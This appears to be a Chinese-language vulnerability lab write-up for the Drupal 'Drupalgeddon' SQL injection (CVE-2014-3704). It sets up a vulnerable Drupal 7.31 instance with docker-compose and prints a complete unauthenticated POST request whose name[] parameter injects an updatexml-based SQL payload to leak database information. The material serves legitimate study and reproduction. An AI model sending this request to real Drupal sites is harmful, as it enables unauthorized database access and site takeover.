Drupal < 7.32 “Drupalgeddon” SQL注入漏洞（CVE-2014-3704）

Path drupal/CVE-2014-3704

Drupal 是一款用量龐大的CMS，其7.0~7.31版本中存在一處無需認證的SQL漏洞。通過該漏洞，攻擊者可以執行任意SQL語句，插入、修改管理員信息，甚至執行任意代碼。

漏洞環境

執行如下命令啟動Drupal 7.31環境：

docker-compose up -d

環境啟動后，訪問http://your-ip:8080即可看到Drupal的安裝頁面，使用默認配置安裝即可。

其中，Mysql數據庫名填寫drupal，數據庫用戶名、密碼為root，地址為mysql：

安裝完成后，訪問首頁：

漏洞復現

該漏洞無需認證，發送如下數據包即可執行惡意SQL語句：

POST /?q=node&destination=node HTTP/1.1
Host: your-ip:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 120

pass=lol&form_build_id=&form_id=user_login_block&op=Log+in&name[0 or updatexml(0,concat(0xa,user()),0)%23]=bob&name[0]=a

可見，信息已被爆出：